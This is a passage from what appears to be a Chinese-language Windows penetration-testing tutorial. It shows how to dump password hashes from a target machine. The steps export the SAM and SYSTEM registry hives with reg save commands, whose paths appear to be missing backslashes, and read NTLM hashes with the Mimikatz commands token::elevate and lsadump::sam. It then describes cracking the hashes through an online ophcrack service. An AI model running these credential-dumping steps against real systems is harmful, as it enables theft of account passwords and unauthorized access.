3、通过SAM和System文件抓取密码和Hash
首先利用注册表命令将目标机的sam或者system文件导出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后将目标机上的sam.hive和system.hive下载到本地,利用Mimikatz读取sam和system文件获取NTLMHash:
token::elevate
lsadump::sam
Windows密码破解方法
1、ophcrack在线破解
再通过以上工具获取到密码Hash后,我们需要对其进行破解,以得到明文密码。Ophcrack网站https://www.objectif-securite.ch/en/ophcrack提供了在线Hash破解服务,我们将得到的NTLM Hash输入到第一个查询框内,点击GO即可进行破解,小于14位的密码一般在几分钟内就可以破解完成:
图2:ophcrack在线破解